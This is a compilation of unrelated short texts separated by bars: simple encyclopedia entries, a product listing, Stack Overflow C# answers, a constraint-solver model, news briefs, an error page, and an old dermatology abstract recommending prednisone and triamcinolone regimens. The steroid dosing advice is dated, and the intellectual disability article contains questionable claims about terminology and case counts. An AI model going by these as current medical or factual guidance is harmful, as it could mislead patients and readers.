What is an intellectual disability?
To have an intellectual disability, a person must:
Have an intelligence quotient (IQ) score of less than 70 (this is just over two people in a hundred) and
Have trouble with parts of daily life.
Types of intellectual disabilities
There are two major types of intellectual disability.
The first is syndromic intellectual disability. This means that the person has a syndrome that causes intellectual disability, as well as medical issues and other problems. Down syndrome and fetal alcohol syndrome are two examples of syndromic intellectual disabilities.
The second is non-syndromic intellectual disability. This means that the intellectual disability is not a part of a syndrome.
Levels of intellectual disability
There are three levels of intellectual disability, based on how severe a person's disability is:
The first and most common is mild intellectual disability. A person with mild intellectual disability can usually act without help from other people, but may need help with things like paying taxes.
The second level is moderate intellectual disability. Someone with moderate intellectual disability has an IQ between 40 and 55. They cannot live by themselves, but can learn to perform basic tasks.
The third level is severe intellectual disability. Someone with severe intellectual disability needs a lot of help and can only do simple things.
Mild intellectual disability may not be noticed until a child starts school. Moderate and severe intellectual disability can be seen before a child starts school.
How common are intellectual disabilities?
Intellectual disability affects about 2 to 3% of the general population. Seventy-five to ninety percent of the affected people have mild intellectual disability. Non-syndromic, or idiopathic cases account for 30 to 50% of these cases. About a quarter of cases are caused by a genetic disorder, and about 5% of cases are inherited. Cases of unknown cause affect about 95 million people .
The top three most common causes of intellectual disability are Down syndrome, DiGeorge syndrome, and Fetal alcohol syndrome.
Genetic disorders
Genetic disorders are caused by problems with a child's genes. Children are born with these disorders.
For example, Down syndrome happens when a child has an extra copy of chromosome 21. Another example is DiGeorge syndrome. This is caused by the deletion of a small segment of chromosome 22.
Problems during pregnancy
Substances called teratogens can prevent a fetus from developing normally. If a teratogen enters a woman's body while she is pregnant, it can cause developmental problems, like intellectual disabilities.
Examples of teratogens that can cause intellectual disabilities include:
Alcohol
Alcohol is the most common cause of intellectual disability which can be prevented. Alcohol is poisonous to a fetus and can cause fetal alcohol syndrome if a mother drinks while pregnant
Illegal drugs
Certain medications, like warfarin (a blood-thinning medicine) and thalidomide
Certain toxic chemicals, like lead and mercury, if a woman is exposed to enough of them during her pregnancy
Certain diseases, like rubella and syphilis, if the mother has them during pregnancy
Problems during birth
For example, if a child does not get enough oxygen during birth, it can hurt the brain and lead to intellectual disability later.
Diseases and trauma
Some childhood illnesses, like measles and whooping cough, can cause intellectual disability if not treated properly. So can infections that affect the brain, like meningitis and viral encephalitis.
Brain injuries can cause intellectual disability at any age.
Malnutrition
Lack of proper nutrition can lead to intellectual disability over time.
Not having enough iodine in the body
Iodine deficiency (not having enough iodine in the body) can lead to several medical issues, including intellectual disability. The most common way to prevent this is by adding iodine to salt. This is a much more common problem in developing countries.
Diagnosis
In the DSM, there are three requirements a person has to meet in order to be diagnosed with an intellectual disability.
Low intelligence quotient (IQ)
First, the person must have a low intelligence quotient (IQ). IQ is measured with an IQ test.
If the person has an IQ of below 70, they may have an intellectual disability. However, they must still meet the other two requirements to be diagnosed with an intellectual disability.
Trouble with daily activities
Second, to qualify for an intellectual disability, a person must have trouble in more than one area of normal daily activities. These activities are often called "adaptive behaviors" or "activities of daily living (ADLs)." Some examples of adaptive behavior are:
Getting dressed
Using the bathroom
Eating and drinking
Being able to have a conversation
Acting properly in different situations
To see if a child is having trouble with these, a doctor will talk to people who know the child, and will watch the child's behavior.
Beginning in childhood
The final requirement is that the symptoms of intellectual disability have to begin in childhood or adolescence. If the issues do not start at a young age, they are probably caused by a different illness of the brain.
Management
There is currently no cure for intellectual disability. Those affected can learn to cope and do many things, if they get enough support and are taught well. There are many places around the world for someone with intellectual disability to get help. These places, such as group homes, can take care of people with intellectual disabilities, as well as help them find jobs, find a house of their own, or help them take care of their children.
There are some different ways for people with intellectual disability and those around them to learn how to help the person with the disability. One kind is psychosocial treatment. This is meant for very young children. Psychosocial treatment helps them learn basic skills and increase learning over their lifetime. Another kind is behavioral treatment. This is meant to help young people, but can be used for adults as well. Behavior treatment helps teach language skills as well as social skills like sharing or following instructions. A third kind of help is cognitive-behavioral treatment. This is a combination of the previous two treatments. Cognitive-behavioral therapy helps children with intellectual disability both learn skills and learn how to plan ahead. Another type of help a person with intellectual disability can get is family-oriented help. Family-oriented help focuses on teaching family members how to help the person in their family with intellectual disability.
Many people with an intellectual disability have other health problems, for which they will be given specific drugs. As an example, autistic children with developmental delay may use anti-psychotics or mood stabilizers to help with behavior. Giving drugs to intellectually disabled people needs to be monitored; side-effects often occur, and are wrongly diagnosed as problems with behavior or as psychiatric problems.
History
People have had intellectual disability throughout history. People with intellectual disability have had a lot of trouble in the past. The oldest idea of where intellectual disability came from was in ancient Greece. Hippocrates thought that intellectual disability was caused by an issue with the four humors. For several hundred years in Europe, churches took care of people with intellectual disabilities. In the 17th century, Thomas Willis suggested that intellectual disability was a disease caused by issues with the structure of the brain. In the 18th and 19th centuries, people with intellectual disabilities were put in asylums. The asylums would give them basics like food and shelter, but were not always good to the people in them. In the early 20th century, people with intellectual disability were made to not be able to have children and could not marry. It was thought that this would reduce the amount of intellectual disabilities in the future. This is not done anymore because it does not follow the idea of human rights.
In the 1950s, a group called the Civitans started to help people with intellectual disability. In the '70s, many people wanted to remove the stigma around people with intellectual disability. Now, people with intellectual disability are treated as people with something to be fixed instead of less than "normal" people. There are also fewer people with intellectual disability being sent to asylums.
Words that were used to describe people with an intellectual disability have changed a lot. The most common words used today are "special", "challenged", "learning disabled" and "developmentally delayed". Some previous words to describe people with intellectual disability are "cretin", "idiot", "imbecile", "moron", and "retarded", all of which are now regarded as insulting.
Society
People with intellectual disability are often treated badly by people without disabilities. They are often not allowed to make choices about their own lives and are not considered a full part of society. Their abusers are often people who are supposed to care for them. 39-83% of women with intellectual disability will be sexually abused before they are 18 years old.
The dignity and human rights of people with intellectual disability are protected by the Convention on the Rights of Persons with Disabilities as well as other disabilities and equally like other persons without disabilities. |
Rainmaker 1, 2, & 3 Gallon Dip Tube Hose and Nut Replacement (24/Cs)
$6.99
The Rainmaker Sprayer replacement Lance Assembly 708905 includes handle, lance and spray tip. 708909 is a replacement Sprayer Pump. 708907 is a replacement O-Ring Kit. 708915 is a replacement kit that includes Dip tube, hose and nut. All parts are for use with Rainmaker 1 gallon (708904), 2 gallon (708906) and 3 gallon pump sprayers (708908).
Description
The Rainmaker Sprayer replacement Lance Assembly 708905 includes handle, lance and spray tip. 708909 is a replacement Sprayer Pump. 708907 is a replacement O-Ring Kit. 708915 is a replacement kit that includes Dip tube, hose and nut. All parts are for use with Rainmaker 1 gallon (708904), 2 gallon (708906) and 3 gallon pump sprayers (708908). |
Hery is a commune. It is found in the Yonne department in the center of France. |
Use and abuse of systemic corticosteroid therapy.
Steroid-responsive acute dermatoses should be treated with a single morning dose of prednisone for approximately 2 weeks. It is necessary to "taper" a short course of oral prednisone given by this method. Chronic dermatoses should be treated whenever possible with prednisone used in the morning and on alternate days. This method is effective, is free of most side effects, and suppresses the HPA axis minimally. There are few real advantages in using intramuscular corticosteroids. TAC is an unusually strong suppressor of the HPA axis. For chronic dermatoses, a less suppressive preparation might best be chosen if the physician feels that the intramuscular route is the most reasonable one. In any event TAC should never be used more often than every two months. Finally, the time-course of HPA recovery following short courses of steroids is presently unknown. Nonetheless, some astute critics of steroid metabolism have felt obliged to advise us that individuals who have received from 1 to 4 weeks of suppressive steroid treatment should be suspect as to the integrity of their HPA axis in stressful situations for up to one year. The withdrawal from, as well as the use of, systemic corticosteroids requires a creative and critical physician. |
"Don't Bring Me Down" is the ninth and final track from Electric Light Orchestra's eighth studio album Discovery. It went to number 1 in Canada, number 2 in Austria and Switzerland, number 3 in the United Kingdom, number 4 in the United States, number 5 in Belgium, Germany and the Netherlands and number 6 in Australia, Ireland and New Zealand. |
Abstract
Background No study has examined dopamine D 2/3 receptor (D 2/3 R) availability in antipsychotic-free older patients with schizophrenia.
Methods We included patients with schizophrenia 50 years or older who were antipsychotic-free for at least 3 months. We compared non-displaceable binding potential (BP ND ) of [11C]-raclopride in the caudate, putamen, ventral striatum, and globus pallidus between patients and age- and sex-matched healthy controls.
Results Ten patients participated (antipsychotic-naive = 4). No differences in BP ND were found between patients and controls in any ROIs (F(1, 72) = .42, p = .52). |
Keene is the only city in and the seat of Cheshire County, New Hampshire, United States. The population was 23,409 at the 2010 census. |
Teens are Working Without a Net
Peer and cultural pressure lead to a disconnect
from one’s own beliefs and values.
No information and bad information lead to
uninformed decision making.
The absence of healthy relationship frameworks
lead to poor relationship choices.
Silence and shame lead survivors of sexual abuse
and violence to suffer alone.
That’s where we come in.
Who We Are
Talk is an organization of young people, by young people, for young people, working to make Sex Ed better for the next generation. Talk challenges conventional notions of Sex Ed, how it should be taught, and what it means to be “at risk” for making poor relationship and sexual health decisions.
Our Mission
Talk’s Mission is to create a national corps of recent college graduates dedicated to empowering teens to make informed, responsible choices about their relationships and sexual health – and empowering parents to convey their beliefs and values to guide teens’ decision-making. |
The wild yak (Bos mutus) is a large wild bovid native to the Himalayas in Central Asia. It is the ancestor of the domestic yak (Bos grunniens).
Most yaks are domestic, which means they live on farms run by people. There are a few wild yak but there are not many left and are in danger of extinction. There may be as few as 100 yak left in the wild. Wild male yaks stand about 2-2.2 meters tall at the shoulder, the females about 1 metre. Domestic Yaks are shorter, between 1 and 2 metres for both males and females. All yaks have long, thick hair to keep them warm in the cold places they live. Wild yaks can be black or brown. Some domestic yaks are white. All kinds of yaks have horns.
Life
Yaks are herd animals. This means they live in groups called herds. Yaks are herbivores, they don't eat meat. The oldest yaks can live up to 25 years. |
Sorry but ... Something is wrong.Status Code: 500PUOE1Wm9cuU2ptteiEGOKZo7ofCajFuvb5fewYJGlP+mXIP3+y2FIh0USnoElz4cPe+YF6vQj+lNi6EhPh9d1dmoiU2TckI5iBXbqPc3JF0WcB2GQOoTw2IsPoVf2U8aaQvgh63+Yq680KeKYh5JfLhYCgLYe+YFfEu1WUHWwnyCXWOv58V6q+0ZnSv1zu5zCEYSCEenxB+Tf2TOtyZJ4nkAfLViUvD6KYo05EZ2/DdL5qroeE9V7XrLXbQ9ncKMrCTbDxO9B7W0QhBX72lbm7Ywp/IB5RWxELg60runKS78tvSBjLWnJekQ/YK+rvUUX0xu3awtY03FPoYHx5i23155/MI4H6vgP2bIBfQRKQ+Sb1jaXPio+mi8MfymfPTiHsZ4q4kSc+ZXEwFyyVgizxKGnqhUFrLnzQG5kePwkJNC4rVaP7NhURe+n0HG0n4ZUGbA4Tg9yiygQm6a2+Jigg==Instructions: Please don't send a screenshot but copy the full error trace if you want to report this error to our team |
Cory Allan Michael Monteith (May 11, 1982-July 13, 2013) was a Canadian actor and musician, best known for his role as Finn Hudson on the Fox television series Glee.
Acting career
Monteith was born in Calgary, but raised in Victoria, British Columbia. He began his acting career in Vancouver, British Columbia. He played small roles in Final Destination 3, Whisper and Deck the Halls. He had a regular role in Kyle XY. He also guest starred in such Canadian-filmed television shows as Smallville, Supernatural, Flash Gordon, Stargate Atlantis and Stargate SG-1.
In 2005 he acted in Killer Bash about a murdered geek's soul taking revenge on his murderer's children by taking over a girl's body. In 2007, he starred in the MTV series Kaya.
In 2009, Monteith was cast in the Fox series Glee, playing Finn Hudson, the male lead of the glee club and the quarterback of McKinley High School. For his audition tape, he drummed on Tupperware using pencils. The first time he sang in front of an audience was at his in-person audition, at which he sang "Honesty" by Billy Joel. He and Lea Michele, his Glee co-star, were included in Entertainment Weekly'''s 2009 "Summer Must List", being named "Summer's Must Songbirds" for their roles as Finn and Rachel on Glee, respectively.
In April 2010, Monteith was cast in the romantic comedy movie Monte Carlo. In May 2010, the cast of Glee went on a two week live tour with stops in Los Angeles, Phoenix, Chicago and New York City. The cast performed many hits from the show and had several skits between songs.
On August 8, 2010 he co-hosted the Teen Choice Awards. Monteith hosted the Gemini Awards in Toronto on November 13, 2010.
In January 2011, he was filmed for the movie Sisters and Brothers with Dustin Milligan, and it was announced that Monteith is at the center of a new untitled workplace comedy, starring and co-producing.
Music career
Monteith played drums for the Indie rock band "Bonnie Dune" based in Los Angeles. Members include lead singer Justin Wilczynski (who co-starred with Monteith on the short-lived MTV series Kaya''), guitarist Seth Roberts (who is the singer of the band Lakes), and bassist Josh Kerr.
Personal life
Monteith was born in Calgary, Alberta and raised in Victoria, British Columbia. He had one older brother. His parents divorced when he was 7 years old. He lived with his mother in Calgary, Alberta, with his father living in Oromocto, New Brunswick. Before becoming an actor, he worked in Nanaimo, British Columbia as a Wal-Mart people greeter, at a car wash, taxicab driver, school bus driver and roofer.
He lived in Los Angeles. He dropped out of school in the ninth grade. Monteith said in an interview: "It wasn't for me. I can remember ever since about the sixth or seventh grade, I just didn't understand why I had to learn what I was learning. For some reason, there was a spirit of rebellion in me."
Death
Monteith was found dead in his Fairmont Pacific Rim hotel room on July 13, 2013 in Vancouver, British Columbia. He was 31. The cause of his death was of a drug overdose of heroin and alcohol.
Awards and nominations
Awards won
Hollywood Style Awards 2010
Male Future Style Icon Award
SAG Awards 2010
Outstanding Performance by an Ensemble in a Comedy Series
Nominations
SAG Awards 2011
Outstanding Performance by an Ensemble in a Comedy Series
Teen Choice Awards 2009
Choice TV: Actor Breakout Star Male
Teen Choice Awards 2010
Choice TV: Comedy Actor
Choice Smile |
Yes, the Democrats oppose sanctions, but they still agree that the US needs to oust Nicolás Maduro. The Republicans go even further and put the military option on the table. So the only position that we can have is to oppose the US effort to topple this government, to oppose this threat of war, and to demand an immediate end of sanctions. It's not our place to be pontificating about holding 'free and fair elections' if the objective conditions render them impossible. |
Masaki Iwamoto (born 30 October 1983) is a Japanese football player. He plays for HOYO Atletico ELAN Oita.
Club career statistics
|-
|2002||rowspan="2"|Avispa Fukuoka||rowspan="2"|J. League 2||0||0||0||0||0||0
|-
|2003||0||0||0||0||0||0
|-
|2004||Thespa Kusatsu||Football League||9||1||||||9||1
|-
|2005||HOYO Atletico ELAN Oita||Prefectural Leagues||||||||||||
|-
|2006||rowspan="2"|V-Varen Nagasaki||rowspan="2"|Regional Leagues||14||13||1||0||15||13
|-
|2007||17||12||2||1||19||13
40||26||3||1||43||27
40||26||3||1||43||27
|} |
Q:
Recursive call overload method
I am tryting to display the number of tmp files recursively using the below code. But when I call the DirSearch() for recursive purpose; I get an error No overload method can take 1 argument.
namespace TestForm
{
public partial class TEST : Form
{
public TEST()
{
InitializeComponent();
}
private void button1_Click(object sender, EventArgs e)
{
TEST search = new TEST();
search.DirSearch();
int result = search.DirSearch();
label1.Text = result.ToString();
}
public int DirSearch()
{
int count = 0;
var sDir = Directory.GetFiles(@"C:\", "*.tmp", SearchOption.AllDirectories);
try
{
foreach (string d in sDir)
{
foreach (string f in Directory.GetFiles(d, "*.tmp"))
{
string extension = Path.GetExtension(f);
if (extension != null && (extension.Equals(".tmp")))
{
count++;
return count;
}
}
DirSearch(d);
}
}
catch (UnauthorizedAccessException)
{
}
}
}
}
A:
I think you are slightly misunderstanding the recursive algorithm you are trying to implement.
For a recursive method to work, it needs to operate on an input and then call itself again (recursively) on derived inputs.
Your DirSearch() method does not take any input, as such it will compute the same thing over and over again. You need to pass in the root path to the method at which the recursion algorithm will start, so the signature should change to:
public int DirSearch(string rootPath)
Then change:
var sDir = Directory.GetFiles(rootPath, "*.tmp", SearchOption.AllDirectories);
Now in the body of the DirSearch method you have to enumerate all directories in the provided path and then call the DirSeach method with the full path to these directories:
DirSearch(d)
A:
You should be bit cautious when writing recursive code.
In your program/example
Your method signature has to match for DirSearch.
In return count; statement, code returns just after counting one file. You are not counting all of them.
Please note, recursion comes with additional performance penality (Might not be for all cases, i'm leaving it to you to explore your case).
Below code will help you to do what you need.
public static int DirSearch(string root)
{
int count = Directory.GetFiles(root, "*.tmp", SearchOption.TopDirectoryOnly).Count();
foreach (string dir in Directory.GetDirectories(root))
{
count += Directory.GetFiles(dir, "*.tmp", SearchOption.TopDirectoryOnly).Count();
count += DirSearch(dir);
}
return count;
}
Hope this helps !!
|
Bethany Joy Lenz (born April 2, 1981) is an American actress, singer-songwriter and filmmaker. She played Haley James Scott on The CW's television series One Tree Hill. She also played Michelle Bauer Santos in CBS' soap opera Guiding Light.
Lenz' first professional job was in a commercial for dolls from the teen drama series Swans Crossing. She also appeared in commercials for Dr. Pepper and Eggo.
Lenz was born in Hollywood, Florida. |
Q:
c# linq-to-sql EF query to match a particular JSON structure
I've JSON with the following structure:
[
{
"ID": 1,
"Label": "Reg Scheme",
"Colours": [
{
"ID": 1,
"Value": "0x3333cc",
"Result": 1,
"Label": null
},
{
"ID": 2,
"Value": "0x666699",
"Result": 2,
"Label": null
},
{
"ID": 3,
"Value": "0x009966",
"Result": 3,
"Label": null
}
]
},
{
"ID": 2,
"Label": "Spesh Scheme",
"Colours": [
{
"ID": 11,
"Value": "0x59699c",
"Result": 1,
"Label": null
},
{
"ID": 12,
"Value": "0x0070ff",
"Result": 2,
"Label": null
},
{
"ID": 13,
"Value": "0x90865e",
"Result": 3,
"Label": null
}
]
},
and I have an entity dataset whereby I've joined all the relevant information, and am attempting to produce JSON with that structure via a single linq-to-sql EF query to be returned to the webapi method.
My query so far is:
return
DbContext.Schemes
.Join(
DbContext.SchemeColours,
s => s.SchemeID,
sc => sc.SchemeID,
(s, sc) => new
{
s.SchemeID,
s.Label,
sc.Colour,
sc.Result,
sc.ColourID
})
.Select(a =>
new Overlay.ReportColourScheme
{
ID = a.SchemeID,
Label = a.Label,
Colours = new List<Overlay.ReportColour>
{
new Overlay.ReportColour
{
ID = a.ColourID,
Value = a.Colour,
Result = a.Result
}
}
})
.ToArray();
Which is almost there but not quite:
[
{
"ID": 1,
"Label": "Regular Scheme",
"Colours": [
{
"ID": 1,
"Value": "0x3333cc",
"Result": 1,
"Label": null
}
]
},
{
"ID": 1,
"Label": "Regular Scheme",
"Colours": [
{
"ID": 2,
"Value": "0x666699",
"Result": 2,
"Label": null
}
]
},
{
"ID": 1,
"Label": "Regular Scheme",
"Colours": [
{
"ID": 3,
"Value": "0x009966",
"Result": 3,
"Label": null
}
]
},
{
"ID": 2,
"Label": "Protanopia adjusted Scheme",
"Colours": [
{
"ID": 11,
"Value": "0x59699c",
"Result": 1,
"Label": null
}
]
},
{
"ID": 2,
"Label": "Protanopia adjusted Scheme",
"Colours": [
{
"ID": 12,
"Value": "0x0070ff",
"Result": 2,
"Label": null
}
]
},
{
"ID": 2,
"Label": "Protanopia adjusted Scheme",
"Colours": [
{
"ID": 13,
"Value": "0x90865e",
"Result": 3,
"Label": null
}
]
},
As of course it creates a new list for every resultID. The top-level ID is a SchemeID- what I'm looking for is logic along the lines of: "take the first 3 Results with a particular schemeID, add them to a list in Colours, then move on to the next schemeID"
I believe this will produce identical JSON that I started the post with.
Any assistance at all would be greatly appreciated, thank you.
A:
The main issue is that you are using a Join where actually you need a Group Join:
return DbContext.Schemes
.GroupJoin(DbContext.SchemeColours,
s => s.SchemeID,
sc => sc.SchemeID,
(s, colours) => new Overlay.ReportColourScheme
{
ID = s.SchemeID,
Label = s.Label,
Colours = colours
.Select(sc => new Overlay.ReportColour
{
ID = sc.ColourID,
Value = sc.Colour,
Result = sc.Result,
})
.ToList()
})
.ToArray();
But since you are using Entity Framework, it would be much better and eaiser if you define (if you already haven't) and use a navigation property:
class Scheme
{
// ...
public ICollection<SchemeColour> Colours { get; set; }
}
and then simply
return DbContext.Schemes
.Select(s => new Overlay.ReportColourScheme
{
ID = s.SchemeID,
Label = s.Label,
Colours = s.Colours
.Select(sc => new Overlay.ReportColour
{
ID = sc.ColourID,
Value = sc.Colour,
Result = sc.Result,
})
.ToList()
})
.ToArray();
|
This Morning is a British daytime television programme that is broadcast on ITV in the United Kingdom and Virgin Media One in the Republic of Ireland. It features news, home, food, health and entertainment segments. The current main presenters are Holly Willoughby, Alison Hammond and Dermot O'Leary.
The show aired its first episode on 3 October 1988. The longest serving presenter of the show is Ruth Langsford who presented the series continously for 21 years since 1999. The show was originally presented by husband and wife duo Richard Madeley and Judy Finnigan until 2001.
It is currently presented by Holly Willoughby from Monday to Thursday, and Dermot O'Leary and Alison Hammond on Fridays and holidays. Josie Gibson and Craig Doyle are also recurring presenters. From 2002 to 2023, Phillip Schofield was also one of the main hosts but he resigned due to several controversies.
English-language television programs
British television series |
Helpston railway station
Helpston railway station was a station in Helpston, Cambridgeshire, on the Midland Railway's Syston and Peterborough Railway. It was closed in 1966. The Great Northern Railway main line runs adjacent to the Midland Railway at this point, but the Great Northern never had a station in Helpston. This was due to an agreement whereby the Midland carried materials to the site during construction of the Great Northern, and in return the Great Northern offered no competition for services on this section.
The goods shed survives, as does the Great Northern Railway signal box, which is now used only to monitor a number of level crossings in the vicinity. Helpston level crossing itself carries the Helpston to Glinton road over the four tracks of the ex-GNR line and the two tracks of the ex-MR line. This was previously two separate level crossings, controlled by two separate signal boxes. There was space for two cars between the level crossings. The crossings were merged and converted from gates to full barriers in the 1970s.
References
Category:Disused railway stations in Cambridgeshire
Category:Transport in Peterborough
Category:Buildings and structures in Peterborough
Category:Railway stations opened in 1846
Category:Railway stations closed in 1966
Category:Former Midland Railway stations
Category:Beeching closures in England
Category:1846 establishments in England |
Ryu Saito (born 18 September 1979) is a former Japanese football player.
Club statistics |
Operation IceBridge, NASA's airborne mission to monitor polar ice, is amid its fourth week of flights for the Arctic 2011 campaign. Researchers and crew successfully completed flights from Thule, Greenland, to monitor sea ice and have now moved to Kangerlussuaq, Greenland to focus on flights monitoring the ice sheet.
Flying a distance of about 19,000 miles [30,000 kilometers] over the Arctic Ocean, scientists onboard the P-3 collected data during eight sea ice flights based from Thule Air Base. One additional sea ice flight remains to be flown from Kangerlussuaq.
Why Fly Sea Ice?
Sea ice flights, flown this year from March 16-28, take priority early in the mission's Arctic campaigns. That's because sea ice typically reaches its annual maximum extent in March, and scientists want to collect data before the ice begins to melt and retreat during northern hemisphere's summer. This year, sea ice reached its maximum extent on March 7, reaching 5.7 million square miles and tying for the lowest extent since the start of satellite measurements in 1979.
The thickness of Arctic sea ice cover is also declining, on average, throughout the satellite record, according to scientists including Joey Comiso of NASA's Goddard Space Flight Center in Greenbelt, Md. Now, after the Ice, Cloud, and land Elevation Satellite (ICESat) stopped collecting data in 2009, IceBridge continues to collect the data scientists need to observe sea ice thickness.
The mission's airborne instrument suite collects lidar and radar data making it possible to monitor both the sea ice freeboard and the snow layer on top of the sea ice. Both measurements are important for quantifying the sea ice thickness and predicting the heat exchange between the Arctic Ocean and the atmosphere.
Then, on March 23, the P-3 flew one of the campaign's most challenging flights - an overpass of the U.S. Navy's ICEX camp, an assemblage of tents and shacks drifting on an ice floe north of Fairbanks.
On the ground with ICEX was a team of researchers from the Army's Cold Regions Research and Engineering Laboratory and the Naval Research Laboratory, who established a line that would be surveyed from on, below and above the ice. Comparing measurements from each vantage point helps scientists improve the accuracy of sea ice thickness measurements.
Sea ice camps are moving targets, drifting along with the wind and ocean currents. The erratic movement makes for a challenging overflight.
"The sea ice moves unpredictably, crazy, like a drunken sailor," said John Sonntag of URS Corporation, and the IceBridge instrument team lead.
Just before the mission, the camp was floating north at about 66 feet per hour, but by the time the aircraft was nearby it had suddenly veered east at about 660 feet per hour. The flyover required precise coordination with ground teams before and during the flight.
The P-3 returned to Thule on March 25 to complete three more science flights before transiting to Kangerlussuaq, the base of operations for the next few weeks.
Land Ho!
The single remaining sea ice flight planned to fly from Kangerlussuaq will overfly a CRYOVEX site. The sites are designed to calibrate the European Space Agency's ice-observing satellite, CryoSat-2. Overflying the site will help scientist link the ICESat, IceBridge and Cryosat-2 datasets.
Meanwhile, IceBridge scientists are working to complete a series of land ice flights. To date, IceBridge has completed four land ice flights over west Greenland. Weather has been favorable in that area, which is typical. Upcoming land ice missions to southeast Greenland will rely on a bit more luck, as low pressure from the Icelandic low commonly produces clouds in the region.
Sand Drift ExplainedStavanger, Norway (SPX) Apr 11, 2011
The sand along the south-western coastal rim of Norway has drifted for more than 9000 calendar years. This was triggered by sea-level changes and human activities, new research has found.
Researchers in countries such as Denmark, the Netherlands and Poland study sand drift, but most of them are focusing on sand dunes along the coastline, not on the plains further inland.
"Sand dunes ... read more
The content herein, unless otherwise known to be public domain, are Copyright 1995-2014 - Space Media Network. AFP, UPI and IANS news wire stories are copyright Agence France-Presse, United Press International and Indo-Asia News Service. ESA Portal Reports are copyright European Space Agency.
All NASA sourced material is public domain. Additional copyrights may apply in whole or part to other bona fide parties. Advertising does not imply endorsement,agreement or approval of any opinions, statements or information provided by Space Media Network on any Web page published or hosted by Space Media Network. Privacy Statement |
Lekoumou is a departement of the Republic of the Congo, in the south. Its capital is Sibiti.
Lekoumou is divided into four districts:
Bambama District
Komono District
Sibiti District
Zanaga District |
Officer On Paid Administrative Leave After Being Arrested for DUI Stemming From Accident
An off-duty Henderson police sergeant was arrested January 11th for suspicion of driving under the influence.
Henderson Sgt. Lisa Mattingly was arrested booked into the Henderson Detention Center following a two vehicle traffic accident shortly before 10 p.m. The accident, which occurred near the intersection of Gibson Road and Horizon Ridge Parkway was described as minor.
Officers responding to the scene deemed Mattingly was intoxicated and charged her with DUI First Offense and Following Too Closely, both misdemeanors.
Mattingly, an 11-year veteran of the Henderson Police Department, was paid $158,941.72 in total pay and benefits in 2011. |
A jig is a lively dance. |
predicate all_different_int(array [int] of var int: x);
predicate count(array [int] of var int: x, var int: y, var int: c);
predicate fixed_cumulative(array [int] of var int: s, array [int] of int: d, array [int] of int: r, int: b);
predicate global_cardinality(array [int] of var int: x, array [int] of int: cover, array [int] of var int: counts);
predicate maximum_int(var int: m, array [int] of var int: x);
predicate minimum_int(var int: m, array [int] of var int: x);
predicate sliding_sum(int: low, int: up, int: seq, array [int] of var int: vs);
predicate sort(array [int] of var int: x, array [int] of var int: y);
predicate table_bool(array [int] of var bool: x, array [int, int] of bool: t);
predicate table_int(array [int] of var int: x, array [int, int] of int: t);
predicate var_cumulative(array [int] of var int: s, array [int] of int: d, array [int] of int: r, var int: b);
var 16..16: A = 16;
var 2..2: B = 2;
var 1..99: C;
var 1..99: D;
var 1..99: E;
var 8..8: F = 8;
var 14..14: G = 14;
var 1..99: H;
var 1..99: I;
var 1..9801: INT____00001 :: is_defined_var :: var_is_introduced;
var 1..9801: INT____00002 :: is_defined_var :: var_is_introduced;
var 1..9801: INT____00003 :: is_defined_var :: var_is_introduced;
var 1..9801: INT____00004 :: is_defined_var :: var_is_introduced;
var 1..9801: INT____00005 :: is_defined_var :: var_is_introduced;
var 1..9801: INT____00006 :: is_defined_var :: var_is_introduced;
var 1..99: K;
array [1..10] of var 1..99: LD :: output_array([1..10]) = [16, 2, C, D, E, 8, 14, H, I, K];
constraint all_different_int(LD);
constraint int_lin_eq([1, -1], [INT____00001, INT____00002], 192);
constraint int_lin_eq([1, -1], [INT____00005, INT____00006], 192);
constraint int_lin_eq([1, -1, 1, -1], [INT____00001, INT____00002, INT____00003, INT____00004], 0);
constraint int_lin_eq([1, -1, 1, -1], [INT____00003, INT____00004, INT____00005, INT____00006], 0);
constraint int_times(C, C, INT____00001) :: defines_var(INT____00001);
constraint int_times(D, D, INT____00003) :: defines_var(INT____00003);
constraint int_times(E, E, INT____00005) :: defines_var(INT____00005);
constraint int_times(H, H, INT____00002) :: defines_var(INT____00002);
constraint int_times(I, I, INT____00004) :: defines_var(INT____00004);
constraint int_times(K, K, INT____00006) :: defines_var(INT____00006);
solve :: int_search(LD, first_fail, indomain, complete) satisfy;
|
Philemon Raul Masinga (28 June 1969 - 13 January 2019) was a South African professional footballer and manager who played as a striker from 1990 to 2002. He was renowned as a strong who stood out for his leadership on the pitch, and he was known for his great dribbling, speed, and his incredible goalscoring ability and finishing, he is widely regarded as one of the best South African strikers of all time.
Club career
He made his debut for Jomo Cosmos in 1990, before moving on to Mamelodi Sundowns.
In 1994 he left for English Premier League club Leeds United; the deal that his agent Marcelo Houseman did with Leeds manager Howard Wilkinson also involved Lucas Radebe moving to Leeds from Kaizer Chiefs. He played in the English Premier League for two years, playing 31 games and scoring five goals, and also scored a hat-trick in an FA Cup tie against Walsall on 17 January 1995.
Masinga moved to Switzerland with St. Gallen in 1996, followed by spells in Italy with Salernitana and Bari. In 2001, a return to English Football with Coventry City fell through after he failed to secure a work permit, following which he moved to Al Wahda FC in Abu Dhabi where he completed his playing career.
International career
Masinga made his international debut in July 1992 against Cameroon; this was South Africa's first match following readmission of the country to international football.
In an African Cup of Nations qualifier versus Zambia in 1992, Masinga became the first South African ever to be sent off in an international match. He was in the Bafana Bafana side when South Africa won the African Cup of Nations in 1996 and when they finished second to Egypt in the 1998 African Cup of Nations. "Chippa", as he was affectionately known, scored the decisive goal in the 1997 game against the Republic of the Congo that took South Africa to the 1998 World Cup in France. He played 58 games for his country, scoring 18 goals.
International goals
Managerial career
In 2006, Masinga briefly coached PJ Stars, a now-defunct third-division South African club.
Honours
Jomo Cosmos
Nedbank Cup: 1990
Mamelodi Sundowns
National Soccer League: 1993
Leeds United
League Cup; Runner-up: 1996
South Africa
Africa Cup of Nations winners: 1996
Africa Cup of Nations runner-up: 1998
Death
On 13 January 2019, the president of the South African Football Association, Danny Jordaan, announced his death. Masinga had been admitted to hospital the previous month, due to cancer.
External links
Klerksdorper.com The Number One Internet Site for Klerksdorp
See also
List of African association football families |
Early red cell transfusion favourably alters cerebral oxygen extraction in very preterm newborns.
